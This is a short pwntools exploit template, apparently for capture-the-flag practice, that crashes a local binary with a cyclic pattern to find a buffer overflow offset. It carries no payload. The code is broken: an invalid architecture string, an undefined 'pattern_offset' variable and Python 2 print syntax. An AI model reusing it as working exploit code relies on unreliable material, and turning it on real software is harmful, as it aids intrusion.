exploit.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template
from pwn import *

# Set up pwntools for the correct architecture
context.update(arch='i386|amd64')
exe = './binary'
rop = ROP(exe)

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

io = start()

# change the recvuntil string and crash the binary
io.recvuntil('>\n')
io.sendline(cyclic(1000))
io.wait()


# get core file and let's read in the values at time of crash
core = io.corefile
base = core.rsp # eip/rsp


# get the pattern offset
if pattern_offset <= 0:
    print "Couldn't find the offset"
else:
    print "Pattern offset in hex: %s" % hex(pattern_offset)


# if you want to run a second time with GDB support
args.GDB = True
io = start()

# finish with an interactive
io.interactive()